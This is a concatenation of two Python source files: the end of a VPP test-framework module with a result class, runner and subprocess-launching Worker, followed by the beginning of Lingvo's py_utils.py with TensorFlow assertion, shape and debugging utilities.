                    if self.current_test_case_info.logger:
                        self.current_test_case_info.logger.debug(
                            'symlink already exists')
                else:
                    os.symlink(self.current_test_case_info.tempdir, link_path)
            except Exception as e:
                if self.current_test_case_info.logger:
                    self.current_test_case_info.logger.error(e)

    def send_result_through_pipe(self, test, result):
        """Forward (test id, result) to the parent process, if a pipe is set."""
        if hasattr(self, 'test_framework_result_pipe'):
            pipe = self.test_framework_result_pipe
            if pipe:
                pipe.send((test.id(), result))

    def log_error(self, test, err, fn_name):
        """Log the error/failure with its formatted traceback."""
        if self.current_test_case_info:
            # _ErrorHolder wraps class-level (setUpClass etc.) failures.
            if isinstance(test, unittest.suite._ErrorHolder):
                test_name = test.description
            else:
                test_name = '%s.%s(%s)' % (test.__class__.__name__,
                                           test._testMethodName,
                                           test._testMethodDoc)
            self.current_test_case_info.logger.debug(
                "--- %s() %s called, err is %s" %
                (fn_name, test_name, err))
            self.current_test_case_info.logger.debug(
                "formatted exception is:\n%s" %
                "".join(format_exception(*err)))

    def add_error(self, test, err, unittest_fn, error_type):
        """Common bookkeeping for addFailure()/addError().

        Logs the error, records it via the base-class hook, builds the
        result string, creates the FAILED symlink and checks for a core
        dump in the test's tempdir.
        """
        if error_type == FAIL:
            self.log_error(test, err, 'addFailure')
            error_type_str = colorize("FAIL", RED)
        elif error_type == ERROR:
            self.log_error(test, err, 'addError')
            error_type_str = colorize("ERROR", RED)
        else:
            raise Exception('Error type %s cannot be used to record an '
                            'error or a failure' % error_type)

        unittest_fn(self, test, err)
        if self.current_test_case_info:
            self.result_string = "%s [ temp dir used by test case: %s ]" % \
                                 (error_type_str,
                                  self.current_test_case_info.tempdir)
            self.symlink_failed()
            self.failed_test_cases_info.add(self.current_test_case_info)
            # Attribute any core file to the first failing test only.
            if is_core_present(self.current_test_case_info.tempdir):
                if not self.current_test_case_info.core_crash_test:
                    if isinstance(test, unittest.suite._ErrorHolder):
                        test_name = str(test)
                    else:
                        test_name = "'{!s}' ({!s})".format(
                            get_testcase_doc_name(test), test.id())
                    self.current_test_case_info.core_crash_test = test_name
                self.core_crash_test_cases_info.add(
                    self.current_test_case_info)
        else:
            self.result_string = '%s [no temp dir]' % error_type_str

        self.send_result_through_pipe(test, error_type)

    def addFailure(self, test, err):
        """
        Record a test failed result

        :param test:
        :param err: error message
        """
        self.add_error(test, err, unittest.TestResult.addFailure, FAIL)

    def addError(self, test, err):
        """
        Record a test error result

        :param test:
        :param err: error message
        """
        self.add_error(test, err, unittest.TestResult.addError, ERROR)

    def getDescription(self, test):
        """
        Get test description

        :param test:
        :returns: test description
        """
        return get_test_description(self.descriptions, test)

    def startTest(self, test):
        """
        Start a test

        :param test:
        """

        def print_header(test):
            # Print the test-case banner only once per test class.
            if not hasattr(test.__class__, '_header_printed'):
                print(double_line_delim)
                print(colorize(getdoc(test).splitlines()[0], GREEN))
                print(double_line_delim)
            test.__class__._header_printed = True

        print_header(test)

        unittest.TestResult.startTest(self, test)
        if self.verbosity > 0:
            self.stream.writeln(
                "Starting " + self.getDescription(test) + " ...")
            self.stream.writeln(single_line_delim)

    def stopTest(self, test):
        """
        Called when the given test has been run

        :param test:
        """
        unittest.TestResult.stopTest(self, test)
        if self.verbosity > 0:
            self.stream.writeln(single_line_delim)
            self.stream.writeln("%-73s%s" % (self.getDescription(test),
                                             self.result_string))
            self.stream.writeln(single_line_delim)
        else:
            self.stream.writeln("%-73s%s" % (self.getDescription(test),
                                             self.result_string))

        self.send_result_through_pipe(test, TEST_RUN)

    def printErrors(self):
        """
        Print errors from running the test case
        """
        if len(self.errors) > 0 or len(self.failures) > 0:
            self.stream.writeln()
            self.printErrorList('ERROR', self.errors)
            self.printErrorList('FAIL', self.failures)
        # ^^ that is the last output from unittest before summary
        if not self.runner.print_summary:
            # Silence the remaining unittest output by swapping in a
            # /dev/null-backed stream on both ourselves and the runner.
            devnull = unittest.runner._WritelnDecorator(open(os.devnull, 'w'))
            self.stream = devnull
            self.runner.stream = devnull

    def printErrorList(self, flavour, errors):
        """
        Print error list to the output stream together with error type
        and test case description.

        :param flavour: error type
        :param errors: iterable errors
        """
        for test, err in errors:
            self.stream.writeln(double_line_delim)
            self.stream.writeln("%s: %s" %
                                (flavour, self.getDescription(test)))
            self.stream.writeln(single_line_delim)
            self.stream.writeln("%s" % err)
class VppTestRunner(unittest.TextTestRunner):
    """
    A basic test runner implementation which prints results to standard error.
    """

    @property
    def resultclass(self):
        """Class maintaining the results of the tests"""
        return VppTestResult

    def __init__(self, keep_alive_pipe=None, descriptions=True, verbosity=1,
                 result_pipe=None, failfast=False, buffer=False,
                 resultclass=None, print_summary=True, **kwargs):
        # ignore stream setting here, use hard-coded stdout to be in sync
        # with prints from VppTestCase methods ...
        super(VppTestRunner, self).__init__(sys.stdout, descriptions,
                                            verbosity, failfast, buffer,
                                            resultclass, **kwargs)
        KeepAliveReporter.pipe = keep_alive_pipe

        # Keep the original stream so run() can restore it after
        # printErrors() swapped in a devnull stream.
        self.orig_stream = self.stream

        # Results are forwarded to the parent process via this pipe.
        self.resultclass.test_framework_result_pipe = result_pipe

        self.print_summary = print_summary

    def _makeResult(self):
        return self.resultclass(self.stream,
                                self.descriptions,
                                self.verbosity,
                                self)

    def run(self, test):
        """
        Run the tests

        :param test:
        """
        faulthandler.enable()  # emit stack trace to stderr if killed by signal

        result = super(VppTestRunner, self).run(test)
        if not self.print_summary:
            # Undo the devnull redirection done in printErrors().
            self.stream = self.orig_stream
            result.stream = self.orig_stream
        return result
class Worker(Thread):
    """Runs an external binary on a background thread, capturing its output.

    The exit code is stored in self.result; stdout/stderr are logged.
    """

    def __init__(self, args, logger, env=None):
        self.logger = logger
        self.args = args
        # NOTE(review): 'testcase', 'wait_for_gdb' and 'role' are expected
        # to be provided by subclasses before this __init__ runs - confirm.
        if hasattr(self, 'testcase') and self.testcase.debug_all:
            if self.testcase.debug_gdbserver:
                # Wrap the command under gdbserver for remote debugging.
                self.args = ['/usr/bin/gdbserver', 'localhost:{port}'
                             .format(port=self.testcase.gdbserver_port)] + args
            elif self.testcase.debug_gdb and hasattr(self, 'wait_for_gdb'):
                self.args.append(self.wait_for_gdb)
        # app_bin intentionally uses the original args, not the possibly
        # gdbserver-wrapped self.args.
        self.app_bin = args[0]
        self.app_name = os.path.basename(self.app_bin)
        if hasattr(self, 'role'):
            self.app_name += ' {role}'.format(role=self.role)
        self.process = None
        self.result = None
        env = {} if env is None else env
        self.env = copy.deepcopy(env)
        super(Worker, self).__init__()

    def wait_for_enter(self):
        """If debugging is enabled, print attach instructions and block on ENTER."""
        if not hasattr(self, 'testcase'):
            return
        if self.testcase.debug_all and self.testcase.debug_gdbserver:
            print()
            print(double_line_delim)
            print("Spawned GDB Server for '{app}' with PID: {pid}"
                  .format(app=self.app_name, pid=self.process.pid))
        elif self.testcase.debug_all and self.testcase.debug_gdb:
            print()
            print(double_line_delim)
            print("Spawned '{app}' with PID: {pid}"
                  .format(app=self.app_name, pid=self.process.pid))
        else:
            return
        print(single_line_delim)
        print("You can debug '{app}' using:".format(app=self.app_name))
        if self.testcase.debug_gdbserver:
            print("sudo gdb " + self.app_bin +
                  " -ex 'target remote localhost:{port}'"
                  .format(port=self.testcase.gdbserver_port))
            print("Now is the time to attach gdb by running the above "
                  "command, set up breakpoints etc., then resume from "
                  "within gdb by issuing the 'continue' command")
            # Each worker gets its own gdbserver port.
            self.testcase.gdbserver_port += 1
        elif self.testcase.debug_gdb:
            print("sudo gdb " + self.app_bin +
                  " -ex 'attach {pid}'".format(pid=self.process.pid))
            print("Now is the time to attach gdb by running the above "
                  "command and set up breakpoints etc., then resume from"
                  " within gdb by issuing the 'continue' command")
        print(single_line_delim)
        input("Press ENTER to continue running the testcase...")

    def run(self):
        """Thread body: spawn the process, wait for it, log its output."""
        executable = self.args[0]
        if not os.path.exists(executable) or not os.access(
                executable, os.F_OK | os.X_OK):
            # Exit code that means some system file did not exist,
            # could not be opened, or had some other kind of error.
            self.result = os.EX_OSFILE
            raise EnvironmentError(
                "executable '%s' is not found or executable." % executable)
        self.logger.debug("Running executable: '{app}'"
                          .format(app=' '.join(self.args)))
        env = os.environ.copy()
        env.update(self.env)
        env["CK_LOG_FILE_NAME"] = "-"
        # setpgrp: run in its own process group so signals to the test
        # framework do not propagate into the child.
        self.process = subprocess.Popen(
            self.args, shell=False, env=env, preexec_fn=os.setpgrp,
            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        self.wait_for_enter()
        out, err = self.process.communicate()
        self.logger.debug("Finished running `{app}'".format(app=self.app_name))
        self.logger.info("Return code is `%s'" % self.process.returncode)
        self.logger.info(single_line_delim)
        self.logger.info("Executable `{app}' wrote to stdout:"
                         .format(app=self.app_name))
        self.logger.info(single_line_delim)
        self.logger.info(out.decode('utf-8'))
        self.logger.info(single_line_delim)
        self.logger.info("Executable `{app}' wrote to stderr:"
                         .format(app=self.app_name))
        self.logger.info(single_line_delim)
        self.logger.info(err.decode('utf-8'))
        self.logger.info(single_line_delim)
        self.result = self.process.returncode
if __name__ == '__main__':
    # This module is a framework: it is imported by the test modules and
    # is not meant to be run directly.
    pass
|
py_utils.py | # Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Common utilities."""
# ==============================================================================
# Note: Avoid adding dependencies to py_utils beyond standard python packages
# and tensorflow.
# ==============================================================================
import collections as py_collections
import contextlib
import functools
import hashlib
import inspect
import math
import numbers
import os
import pkgutil
import re
import threading
import traceback
import lingvo.compat as tf
from lingvo.core import cluster_factory
from lingvo.core import gshard_utils
from lingvo.core import hyperparams
from lingvo.core import nested_map
from lingvo.core import ops
from lingvo.core import py_utils_flags
from lingvo.core import retry
from lingvo.core import symbolic
from lingvo.core import thread_local_utils
from lingvo.core import tshape
import numpy as np
import six
# pylint: disable=g-direct-tensorflow-import
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import node_def_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.framework import func_graph
from tensorflow.python.framework import function
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import stateless_random_ops
from tensorflow.python.tf2 import enabled as tf2_enabled
from tensorflow.python.tpu import topology as tf_topology
from tensorflow.python.tpu import tpu_function
from tensorflow.python.util import deprecation
# pylint: enable=g-direct-tensorflow-import
FLAGS = tf.flags.FLAGS
# pylint: disable=protected-access
_FromGlobal = py_utils_flags._FromGlobal
# pylint: enable=protected-access
use_xla = py_utils_flags.use_xla
use_tpu = py_utils_flags.use_tpu
testonly_skip_norm_layers = py_utils_flags.testonly_skip_norm_layers
tpu_compat = py_utils_flags.tpu_compat
use_stateless_vars_init = py_utils_flags.use_stateless_vars_init
ENQUEUE_OPS = '__lingvo_enqueue_ops'
# pylint: disable=protected-access
deprecation._PRINT_DEPRECATION_WARNINGS = False
# pylint: enable=protected-access
ThreadLocalStack = thread_local_utils.ThreadLocalStack
ThreadLocalDict = thread_local_utils.ThreadLocalDict
NestedMap = nested_map.NestedMap
def Assert(condition, data, *args, **kwargs):
    """Wraps tf.Assert; becomes a no-op when asserts are disabled."""
    if not py_utils_flags.enable_asserts():
        return tf.no_op()
    return tf.Assert(condition, data, *args, **kwargs)
def assert_equal(*args, **kwargs):  # pylint: disable=invalid-name
    """Wraps tf.assert_equal; no-op when asserts are disabled."""
    if not py_utils_flags.enable_asserts():
        return tf.no_op()
    return tf.assert_equal(*args, **kwargs)
def assert_greater_equal(*args, **kwargs):  # pylint: disable=invalid-name
    """Wraps tf.debugging.assert_greater_equal; no-op when asserts disabled."""
    if not py_utils_flags.enable_asserts():
        return tf.no_op()
    return tf.debugging.assert_greater_equal(*args, **kwargs)
def assert_greater(*args, **kwargs):  # pylint: disable=invalid-name
    """Wraps tf.assert_greater; no-op when asserts are disabled."""
    if not py_utils_flags.enable_asserts():
        return tf.no_op()
    return tf.assert_greater(*args, **kwargs)
def assert_less_equal(*args, **kwargs):  # pylint: disable=invalid-name
    """Wraps tf.debugging.assert_less_equal; no-op when asserts disabled."""
    if not py_utils_flags.enable_asserts():
        return tf.no_op()
    return tf.debugging.assert_less_equal(*args, **kwargs)
def assert_less(*args, **kwargs):  # pylint: disable=invalid-name
    """Wraps tf.assert_less; no-op when asserts are disabled."""
    if not py_utils_flags.enable_asserts():
        return tf.no_op()
    return tf.assert_less(*args, **kwargs)
def assert_between(x, l, r, *args, **kwargs):  # pylint: disable=invalid-name
    """Asserts that l <= x < r (lower bound inclusive, upper exclusive)."""
    x = tf.convert_to_tensor(x)
    # Cast the bounds to x's dtype so the comparisons are well-defined.
    l = tf.cast(tf.convert_to_tensor(l), x.dtype)
    r = tf.cast(tf.convert_to_tensor(r), x.dtype)
    return tf.group([
        assert_greater_equal(x, l, *args, **kwargs),
        assert_less(x, r, *args, **kwargs)
    ])
def assert_shape_match(*args, **kwargs):  # pylint: disable=invalid-name
    """Wraps ops.assert_shape_match, tagging failures with the call site."""
    if py_utils_flags.enable_asserts():
        # Look two frames up the stack so the message names the caller of
        # this wrapper, not the wrapper itself; keep the basename only.
        filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
        kwargs['msg'] = 'LINGVO ASSERT %s:%s(%s)' % (re.sub(
            r'.*/', '', filepath), line, func)
        return ops.assert_shape_match(*args, **kwargs)
    else:
        return tf.no_op()
def assert_same_dim0(xs, *args, **kwargs):  # pylint: disable=invalid-name
    """Wraps ops.assert_same_dim0; no-op when asserts are disabled."""
    if not py_utils_flags.enable_asserts():
        return tf.no_op()
    return ops.assert_same_dim0(xs, *args, **kwargs)
def assert_even_divide(denorm, num):  # pylint: disable=invalid-name
  """Asserts that denorm is evenly divided by num."""
  denorm = tf.convert_to_tensor(denorm)
  num = tf.convert_to_tensor(num)
  # Integer-only: floor division below would silently round floats.
  # NOTE(review): 'denorminator' in these messages is a typo for 'denominator'
  # (runtime strings left unchanged here).
  if denorm.dtype not in (tf.int32, tf.int64):
    raise ValueError('denorminator.dtype is not tf.int32 or tf.int64.')
  if num.dtype not in (tf.int32, tf.int64):
    raise ValueError('numerator.dtype is not tf.int32 or tf.int64.')
  num = HasShape(num, GetShape(denorm))
  quo = denorm // num
  # Divides evenly iff (denorm // num) * num reconstructs denorm exactly.
  return assert_equal(quo * num, denorm)
def AssertIdShape(expected_ids_shape_pattern, ids_shape, *args):
  """Asserts shape expected_ids_shape_pattern matches all other input shapes."""
  def AssertFn(inputs):
    # ids_shape must match the expected pattern and every extra shape in args.
    dependencies = [
        assert_shape_match(inputs.ids_shape, inputs.expected_ids_shape_pattern)
    ] + [
        assert_shape_match(inputs.ids_shape, x_shape) for x_shape in inputs.args
    ]
    return with_dependencies(dependencies, inputs.ids_shape)
  inputs = NestedMap(
      expected_ids_shape_pattern=expected_ids_shape_pattern,
      ids_shape=ids_shape,
      args=args)
  # Run inside a Defun so the asserts are attached to the returned shape.
  return CallDefun(AssertFn, Transform(tf.convert_to_tensor, inputs))
def _CheckNumerics(x, message=None, *args, **kwargs):
  """Wraps a single floating tensor in tf.debugging.check_numerics."""
  if x.dtype.is_floating:
    # Tensor names are unavailable in eager mode.
    x_name = x.name if not tf.executing_eagerly() else '[eager]'
    if 'name' not in kwargs:
      kwargs['name'] = re.sub(r':\d+', '', x_name) + '_CheckNumerics'
    return tf.debugging.check_numerics(x, message if message else x_name, *args,
                                       **kwargs)
  else:
    # Non-floating tensors cannot contain NaN/Inf; pass through untouched.
    return x
def CheckNumerics(inp, message=None, *args, **kwargs):
  """Check numerics for tensors in inp."""
  if not py_utils_flags.enable_check_numerics():
    return inp
  # Preserve the container type (list/tuple) of the input.
  if isinstance(inp, list):
    return [_CheckNumerics(x, message, *args, **kwargs) for x in inp]
  if isinstance(inp, tuple):
    return tuple(_CheckNumerics(x, message, *args, **kwargs) for x in inp)
  return _CheckNumerics(inp, message, *args, **kwargs)
def with_dependencies(dependencies, output_tensor):  # pylint: disable=invalid-name
  """Returns output_tensor with control deps on `dependencies` attached."""
  with tf.control_dependencies(dependencies):
    return tf.identity(output_tensor)
def _VarInCollection(var, collection):
  """Return whether a variable `var` is in the given variable collection.

  Args:
    var: A variable (any object exposing a `.ref()` method).
    collection: An iterable of variables.

  Returns:
    True iff `var`'s reference equals some element's reference in `collection`.
  """
  # We use variable reference for comparison, since variable is not hashable in
  # eager mode. A generator lets `any` short-circuit on the first match rather
  # than materializing the refs of the whole collection on every call.
  var_ref = var.ref()
  return any(var_ref == v.ref() for v in collection)
@contextlib.contextmanager
def _PrintOptions(*args, **kwargs):
  """Context manager that temporarily overrides numpy print options."""
  saved = np.get_printoptions()
  np.set_printoptions(*args, **kwargs)
  try:
    yield
  finally:
    # Restore whatever options were in effect before entering the scope,
    # even if the body raised.
    np.set_printoptions(**saved)
def _Print(name, x):
  """Logs a numpy value with a wide print width (py_func callback for Log)."""
  with _PrintOptions(linewidth=1000):
    tf.logging.info('%s = %s', name, np.array_repr(x))
def Log(value, prefix, **kwargs):
  """Prints out values of tensors.
  Useful for debugging. E.g.,
    x = ... a tf.Tensor ...
    y = ... a tf.Tensor ...
    z = compute(x, y)
    z = Log(z, 'debug compute()', x=x, y=y)
  Args:
    value: A Tensor. Log happens after this tensor's computed.
    prefix: Every tensor is logged with this prefix.
    **kwargs: keywords and tensors. Tensors are logged in the sort order of
      these keywords.
  Returns:
    value is returned.
  """
  # Ensures tensors are printed in order by chaining control dependencies.
  last = value
  for k in sorted(kwargs):
    with tf.control_dependencies([last]):
      last = tf.py_func(_Print, [prefix + ' : ' + k, kwargs[k]], [])
  with tf.control_dependencies([last]):
    return tf.identity(value)
def Debug(tensor, message='', enabled=True, summarize=100, more=None):
  """Wrapper around tf.Print() and tf.logging.info() to simplify debug printing.
    x = py_utils.Debug(x)
  When the graph is built a regular log info line will be printed:
    -DBG- py_utils_test.py:429 x=Tensor(...
  Then when the tensor node is evaluated it will print lines like:
    -DBG- py_utils_test.py:429 x Const:0[x.shape=][2 2][x=][[1 2][3 4]]
  WARNING: The code that parses local variable names can fail. E.g. don't write
  two Debug() calls on one line or a Debug() call that spans more than one line.
  Args:
    tensor: A tensor to print.
    message: A message to print.
    enabled: To enable the debugging.
    summarize: Integer with number of tensor values to print.
    more: An optional list of additional tensors.
  Returns:
    The tensor.
  """
  if not enabled or _FromGlobal('disable_py_utils_debug'):
    return tensor
  if more is None:
    more = []
  # Inspect the caller's frame to recover the variable names passed in, so the
  # printed output can label values by their source-level names.
  stack = inspect.stack()[1][0]
  caller = inspect.getframeinfo(stack)
  caller_var = ''
  caller_more_vars = []
  if caller.code_context:
    # Rough and likely to fail. But better than nothing.
    match = re.compile(r'Debug\((.*?)(\)|,).*$').search(caller.code_context[0])
    if match:
      caller_var = match.groups()[0]
    if more:
      more_vars = re.compile(r'more=\[(.*?)\].*$').search(
          caller.code_context[0]).groups()[0]
      caller_more_vars = more_vars.split(',')
  the_class = ''
  if 'self' in stack.f_locals:
    the_class = stack.f_locals['self'].__class__.__name__
  header = '-DBG- {}:{}:{}:{} {} '.format(
      os.path.basename(caller.filename), the_class, caller.function,
      caller.lineno, message)
  # Graph-build-time log line (printed once, immediately).
  info = '{}{}={}'.format(header, caller_var, tensor)
  for name, val in zip(caller_more_vars, more):
    info += ' {}={}'.format(name.strip(), val)
  tf.logging.info(info)
  if isinstance(tensor, tf.Tensor):
    # Run-time print: shapes first, then values, for the tensor and extras.
    tensors = []
    tensors += [tf.constant('{}.shape='.format(caller_var)), tf.shape(tensor)]
    for name, val in zip(caller_more_vars, more):
      tensors += [tf.constant('{}.shape='.format(name.strip())), tf.shape(val)]
    tensors += [tf.constant('{}='.format(caller_var)), tensor]
    for name, val in zip(caller_more_vars, more):
      tensors += [tf.constant('{}='.format(name.strip())), val]
    name = tensor.name if not tf.executing_eagerly() else '[eager]'
    info = '{}{} {}'.format(header, caller_var, name)
    return tf.identity(
        tf.Print(tensor, tensors, info, summarize=summarize),
        re.sub(':.*$', '', name))
  return tensor
def _Save(steps, prefix, key, val):
  """Writes one numpy value to '<prefix>.<steps>.<key>.npy' (py_func callback)."""
  filename = '%s.%08d.%s.npy' % (six.ensure_text(prefix), steps,
                                 six.ensure_text(key))
  with tf.io.gfile.GFile(filename, 'w') as outfile:
    np.save(outfile, val)
def Save(value, filename_prefix, **kwargs):
  """Saves values of tensors into files.
  Useful for debugging. E.g.,
    x = ... a tf.Tensor ...
    y = ... a tf.Tensor ...
    z = compute(x, y)
    z = Save(z, '/path/tmp', x=x, y=y, z=z)
  Args:
    value: A Tensor. Saving happens after this tensor is computed.
    filename_prefix: Every tensor is saved with this filename prefix.
    **kwargs: keywords and tensors. Tensors are logged in the sort order of
      these keywords.
  Returns:
    value is returned.
  """
  # Chain control dependencies so tensors are saved in deterministic order.
  last = value
  steps = GetGlobalStep()
  for k in sorted(kwargs):
    with tf.control_dependencies([last]):
      last = tf.py_func(_Save, [steps, filename_prefix, k, kwargs[k]], [])
  with tf.control_dependencies([last]):
    return tf.identity(value)
def HasRank(tensor, expected_rank):
  """Syntactic sugar for asserting that tensor has the expected rank.

  Statically checks when the rank is known at graph-build time; otherwise
  attaches a runtime assert (only when --enable_asserts is set).
  """
  if tensor.shape.ndims is not None and isinstance(expected_rank, int):
    assert tensor.shape.ndims == expected_rank, (
        'Ranks did not match, got %d, '
        'expected %d') % (tensor.shape.ndims, expected_rank)
    return tensor
  if py_utils_flags.enable_asserts():
    return with_dependencies([tf.assert_equal(tf.rank(tensor), expected_rank)],
                             tensor)
  else:
    return tensor
def HasAtLeastRank(tensor, expected_rank):
  """Syntactic sugar for asserting that tensor has rank >= expected_rank."""
  if tensor.shape.ndims is not None and isinstance(expected_rank, int):
    assert tensor.shape.ndims >= expected_rank, (
        'Rank of tensor %d did not exceed the expected value %d.') % (
            tensor.shape.ndims, expected_rank)
    return tensor
  if py_utils_flags.enable_asserts():
    return with_dependencies(
        [tf.debugging.assert_greater_equal(tf.rank(tensor), expected_rank)],
        tensor)
  else:
    return tensor
def GetRank(tensor):
  """Returns tensor's rank as an int if it's available, otherwise a Tensor.
  Args:
    tensor: The input tensor.
  Returns:
    Either an int or a Tensor for the rank of the input tensor.
  """
  if tensor.shape.ndims is not None:
    return tensor.shape.ndims  # int
  else:
    return tf.rank(tensor)  # Tensor
def GetShape(tensor, ndims=None):
  """Returns tensor's shape as a list which can be unpacked, unlike tf.shape.
  Tries to return static shape if it's available. Note that this means
  some of the outputs will be ints while the rest will be Tensors.
  Args:
    tensor: The input tensor.
    ndims: If not None, returns the shapes for the first `ndims` dimensions.
  """
  tensor = tf.convert_to_tensor(tensor)
  dynamic_shape = tf.shape(tensor)
  # Early exit for unranked tensor: nothing static can be recovered.
  if tensor.shape.ndims is None:
    if ndims is None:
      return dynamic_shape
    else:
      return [dynamic_shape[x] for x in range(ndims)]
  # Ranked tensor.
  if ndims is None:
    ndims = tensor.shape.ndims
  else:
    ndims = min(ndims, tensor.shape.ndims)
  # Return mixture of static and dynamic dims: prefer the static value per
  # dimension, falling back to the dynamic tensor slice when unknown.
  static_shape = tensor.shape.as_list()
  shapes = [
      static_shape[x] if static_shape[x] is not None else dynamic_shape[x]
      for x in range(ndims)
  ]
  return shapes
def HasShape(tensor, expected_shape, ndims=None):
  """Syntactic sugar for asserting that tensor has the expected shape.
  Args:
    tensor: A Tensor.
    expected_shape: A Python list or a 1D tensor. Elements of expected_shape can
      be -1 which indicate that any size is valid for that dimension.
    ndims: If not None, check only the first `ndims` dimensions of `tensor`.
      Must be equal to the length of `expected_shape` if not None.
  Returns:
    The input `tensor` with control dependencies that will raise a runtime
    error if dynamic shape checks fail.
  Raises:
    ValueError: A value error if the assertion fails at static shape checks.
  """
  if not py_utils_flags.enable_asserts():
    return tensor
  # Embed caller file:line(function) into the assert message for traceability.
  filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
  msg = 'LINGVO ASSERT %s:%s(%s)' % (re.sub(r'.*/', '',
                                            filepath), line, func)
  tensor_shape = GetShape(tensor)
  if ndims is not None:
    tensor_shape = tensor_shape[:ndims]
  # TODO(jngiam): Attempt to switch back to tf.Assert after it has better
  # support on GPUs.
  assert_op = ops.assert_shape_match(tensor_shape, expected_shape, msg=msg)
  # If expected_shape is a Tensor, then we are unable to perform static checks.
  # In this case, we can do a dynamic check and return.
  if isinstance(expected_shape, tf.Tensor):
    return with_dependencies([assert_op], tensor)
  # Infer ranks from the inputs.
  expected_rank = len(expected_shape)
  if isinstance(tensor_shape, tf.Tensor):
    tensor_rank = tensor.shape.ndims
  else:
    tensor_rank = len(tensor_shape)
  # If ndims is None, then either one of the ranks should not be None, or they
  # should both match. If both ranks are None, then they are both tensors and
  # should be caught by the earlier short-circuit.
  if ndims is None:
    if (tensor_rank is not None) and (expected_rank != tensor_rank):
      raise ValueError('Tensor does not match rank of expected shape.\n'
                       'Tensor shape: {} Expected shape: {}'.format(
                           tensor_shape, expected_shape))
    # Both tensors can be assumed to be of same rank.
    ndims = expected_rank
  else:
    if (tensor_rank is not None) and (tensor_rank < ndims):
      raise ValueError('Tensor has fewer dimensions than ndims.\n'
                       'Tensor shape: {} ndims: {}'.format(tensor_shape, ndims))
    if expected_rank != ndims:
      raise ValueError(
          'Expected shape must have number of dimensions equal to ndims.\n'
          'Expected shape: {} ndims: {}'.format(expected_shape, ndims))
  # Ensure that both tensor_shape and expected_shape are both lists.
  tensor_shape = tensor_shape[:ndims]
  if isinstance(tensor_shape, tf.Tensor):
    tensor_shape = tf.unstack(tensor_shape, num=ndims)
  # Map tf.Dimension values to their held values.
  tensor_shape = [
      v.value if isinstance(v, tf.Dimension) else v for v in tensor_shape
  ]
  expected_shape = [
      v.value if isinstance(v, tf.Dimension) else v for v in expected_shape
  ]
  # Check every statically-known dimension pair; any dynamic dimension forces
  # the runtime assert_op to remain attached.
  all_static_checks = True
  for idx, (dim, expected_dim) in enumerate(zip(tensor_shape, expected_shape)):
    if isinstance(expected_dim, tf.Tensor):
      all_static_checks = False
    elif expected_dim == -1:
      continue
    elif isinstance(dim, tf.Tensor):
      all_static_checks = False
    elif dim != expected_dim:
      raise ValueError('Tensor does not match expected shape on dimension {}.\n'
                       'Tensor shape: {} Expected shape: {}'.format(
                           idx, tensor_shape, expected_shape))
  if all_static_checks:
    # Everything verified statically; no runtime dependency needed.
    return tf.convert_to_tensor(tensor)
  else:
    return with_dependencies([assert_op], tensor)
def HasSameShape(x, ref):
  """Asserts (statically and/or dynamically) that `x` has `ref`'s shape."""
  return HasShape(x, GetShape(ref))
def GetSize(tensor):
  """Returns the total number of elements in `tensor`.

  Returns a Python int when the full static shape is known, otherwise a
  scalar Tensor (tf.size).
  """
  shape = GetShape(tensor)
  # A generator avoids building an intermediate list and lets `any`
  # short-circuit on the first dynamic dimension.
  if (isinstance(shape, tf.Tensor) or
      any(isinstance(x, tf.Tensor) for x in shape)):
    return tf.size(tensor)
  return np.prod(shape)
def CausalSelfAttenPadding(seqlen, dtype):
  """Wraps tf.linalg.band_part() for tflite compatibility.

  Returns a [seqlen, seqlen] matrix of `dtype` with ones strictly above the
  diagonal (future positions are padded) and zeros elsewhere.
  """
  if FLAGS.tflite_compatible:
    # tf.linalg.band_part() is not supported by tflite; build the mask from a
    # broadcasted row/column index comparison instead.
    # [N, 1]
    rows = tf.expand_dims(tf.range(seqlen), -1)
    # [1, N]
    cols = tf.expand_dims(tf.range(seqlen), 0)
    row_cols = rows - cols
    # Bug fix: tf.where requires both branches to share a dtype. The zeros
    # branch previously hard-coded tf.float32, which broke (or silently
    # mismatched) any non-float32 `dtype`.
    return tf.where(row_cols < 0, tf.ones([seqlen, seqlen], dtype),
                    tf.zeros([seqlen, seqlen], dtype))
  else:
    return 1.0 - tf.linalg.band_part(
        tf.ones([seqlen, seqlen], dtype=dtype), -1, 0)
def outside_all_rewrites():  # pylint: disable=invalid-name
  """Returns a context that clears all surrounding control dependencies."""
  return tf.control_dependencies(None)
# TODO(jamesqin): remove once b/147439702 is fixed.
# Thread-local flag marking that we are already inside an
# outside_compilation scope, to avoid nesting it (see RunOnTpuHost).
_OUTSIDE_COMPILATION = threading.local()
def RunOnTpuHost(func, *args, **kwargs):
  r"""Runs the given function call on TPU host.
  Invokes func(\*args, \*\*kwargs) directly if not running on tpu.
  Args:
    func: the function to invoke.
    *args: args of func
    **kwargs: kwargs of func
  Returns:
    The function return value.
  """
  if use_tpu() and not getattr(_OUTSIDE_COMPILATION, 'on', False):
    _OUTSIDE_COMPILATION.on = True
    # try/finally ensures the thread-local flag is reset even if
    # outside_compilation raises; previously an exception left it stuck at
    # True, silently disabling outside compilation for the rest of the thread.
    try:
      res = tf.tpu.outside_compilation(func, *args, **kwargs)
    finally:
      _OUTSIDE_COMPILATION.on = False
  else:
    res = func(*args, **kwargs)
  return res
def tpu_host(func):  # pylint: disable=invalid-name
  r"""Decorates a python function to only run on TPU hosts.
  This function has no effect when running on CPU/GPU.
  Example::
    @py_utils.tpu_host
    def ComputeWER(self):
      # Call a custom op computing WER.
  Args:
    func: the function to invoke
  Returns:
    A TPU-host only function
  """
  def Wrapped(*args, **kwargs):
    return RunOnTpuHost(func, *args, **kwargs)
  return Wrapped
# Maps a TPU job name ('/job:xxx') to the job's DeviceAssignment object.
# When there is only a single TPU job, the key could be None.
_tpu_device_assignment_dict = dict()
def SetTpuDeviceAssignment(tpu_device_assignment, job=None):
